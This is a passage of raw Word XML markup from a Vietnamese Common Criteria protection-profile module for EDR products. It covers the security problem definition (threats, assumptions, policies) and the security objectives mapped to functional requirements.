      <w:r w:rsidR="00B75CA6" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t>chuyên gia phân tích</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi"/>
        </w:rPr>
        <w:t xml:space="preserve"> SOC làm rõ các tình huống sau xử lý.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4974EA" w14:textId="4D863C49" w:rsidR="002B16C4" w:rsidRPr="00204C5F" w:rsidRDefault="002B16C4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc137476357"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6 Các yêu cầu áp dụng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="63DB3196" w14:textId="590D2E67" w:rsidR="002B16C4" w:rsidRPr="00204C5F" w:rsidRDefault="002B16C4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tiêu chuẩn này kế thừa định dạng chính xác theo yêu cầu từ PP cơ sở được chỉ định, như được định nghĩa trong CC và CEM để đảm bảo tính chính xác, các SFR bắt buộc và các SFR tùy chọn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414985AE" w14:textId="12CCB6B6" w:rsidR="00851C6A" w:rsidRPr="00204C5F" w:rsidRDefault="00851C6A" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc502652898"/>
      <w:bookmarkStart w:id="15" w:name="_Toc137476358"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidR="00057A52" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mô tả</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> các vấn đề </w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="002E59EC" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3D0BBBF9" w14:textId="47B407E6" w:rsidR="00851C6A" w:rsidRPr="00204C5F" w:rsidRDefault="002B16C4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Vấn đề </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> được mô tả là các mối đe dọa mà EDR dự kiến sẽ giải quyết, giả định về OE và bất kỳ chính sách </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tổng hợp nào mà EDR dự kiến sẽ thực thi. Có thể mở rộng tới bất kỳ mối đe dọa, giả định và chính sách </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tập trung nào được xác định bởi PP cơ sở.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0637090B" w14:textId="63340E5A" w:rsidR="00851C6A" w:rsidRPr="00204C5F" w:rsidRDefault="002B16C4" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7.1 Các mối đe dọa</w:t>
      </w:r>
      <w:r w:rsidR="00851C6A" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A40B5" w14:textId="0C8964EE" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Đối tượng tấn công là người dùng đặc quyền hợp pháp có quyền truy cập để thay đổi cấu hình khả năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> của EDR hoặc không phải là người dùng quản trị hợp pháp cố gắng truy cập mà không có sự cho phép thích hợp. Đối tượng tấn công có thể thực hiện ẩn các hoạt động độc hại khỏi những người dùng quản trị khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB14D60" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(T. MISCONFIGURATION)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F22BD2" w14:textId="39F85D75" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7.1.2 Tái sử dụng thông tin xác thực</w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(T.CREDENTIAL_REUSE )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F881038" w14:textId="4F5A0240" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Đối tượng tấn công được đặt trên một kênh liên lạc hoặc nơi khác trên cơ sở hạ tầng mạng. Đối tượng tấn công có thể đoán hoặc thu thập thông tin đăng nhập hợp pháp từ EDR, điểm cuối hoặc hoạt động mạng không an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255AE57C" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7.2 Giả định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B229D44" w14:textId="21988146" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Những giả định này được đưa ra trên môi trường hoạt động để có thể đảm bảo rằng chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> của TOE có thể đáp ứng theo yêu cầu chỉ định trong PP-Module. Nếu TOE được đặt trong môi trường hoạt động không đáp ứng các giả định này, TOE có thể mất khả năng cung cấp tất cả các chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> được thiết kế.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1852C3" w14:textId="77777777" w:rsidR="005157CB" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>KẾT NỐI</w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005157CB" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(A.CONNECTIVITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CB32EE" w14:textId="43C8CAAF" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EDR dựa vào kết nối mạng để thực hiện các hoạt động quản trị chủ động.  OE phải cung cấp kết nối mạng đáng tin cậy để EDR hoạt động. EDR phải xử lý hiệu quả các tình huống bất thường khi kết nối không khả dụng hoặc không đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CFBA1C" w14:textId="3B72CCEC" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 Chính sách tổ chức </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2323886F" w14:textId="52C1F42B" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PP-Module này xác định không có chính sách tổ chức </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>đảm bảo an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:spacing w:val="-2"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bổ sung nào ngoài các chính sách được xác định trong Base-PP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2535D002" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc502652903"/>
      <w:bookmarkStart w:id="17" w:name="_Toc136104110"/>
      <w:bookmarkStart w:id="18" w:name="_Toc137476359"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8 Các mục tiêu an toàn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="1C79B3B9" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8.1 Đích an toàn cho TOE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F06F44" w14:textId="6B7B016D" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1.1 Trách nhiệm giải trình </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(O.ACCOUNTABILITY )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E939E1" w14:textId="44E7CC22" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TOE phải cung cấp các cơ sở ghi nhật ký ghi lại các hoạt động quản trị được thực hiện bởi quản trị viên bằng cách </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>định danh</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> và xác thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E2CBA" w14:textId="191337CA" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="008D70AF" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Xác định bởi: </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FAU_GEN.1/EDR, </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FIA_AUT_EXT.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6BA0F" w14:textId="51B56AA0" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="008D70AF" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1.2 Quản lý EDR </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(.EDR_MANAGEMENT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447C86CC" w14:textId="4BA3591C" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TOE phải đảm bảo sự thuận lợi đối với hoạt động quản trị được cấp quyền của doanh nghiệp, cung cấp các giao diện nhất quán và được hỗ trợ cho cấu hình, ý định và hoạt động liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> của doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784C2689" w14:textId="66118EF1" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="008D70AF" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Xác định bởi:</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> FAU_ALT_EXT.1, FAU_COL_EXT.1, FIA_AUT_EXT.1, FIA_PWD_EXT.1, FMT_SMF.1/ENDPOINT, FMT_SMF.1/HOST, </w:t>
      </w:r>
      <w:r w:rsidR="00EA6307" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">FMT_SMR.1, </w:t>
      </w:r>
      <w:r w:rsidR="00BA2AF5" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FMT_SRF_EXT.1,</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> FMT_TRM_EXT.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F3B3A" w14:textId="30F27029" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1.3 </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>An toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> trung chuyển</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(O.PROTECTED_TRANSIT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723FD172" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Để giải quyết cả các mối đe dọa tấn công mạng thụ động (nghe lén) và hoạt động sửa đổi gói tin, TOE phù hợp phải sử dụng kênh đáng tin cậy để bảo vệ tất cả các thông tin liên lạc. Dữ liệu nhạy cảm bao gồm khóa mật mã, mật khẩu và bất kỳ dữ liệu nào khác dành riêng cho ứng dụng không bị lộ bên ngoài ứng dụng hoặc cho người dùng chưa được xác thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552F728" w14:textId="19C2C026" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="008D70AF" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Xác định bởi:</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FCS_DTLSS_EXT.1 (từ gói TLS</w:t>
      </w:r>
      <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), FCS_DTLSC_EXT.1 (từ </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:rStyle w:val="notranslate"/>
          <w:szCs w:val="22"/>
        </w:rPr>
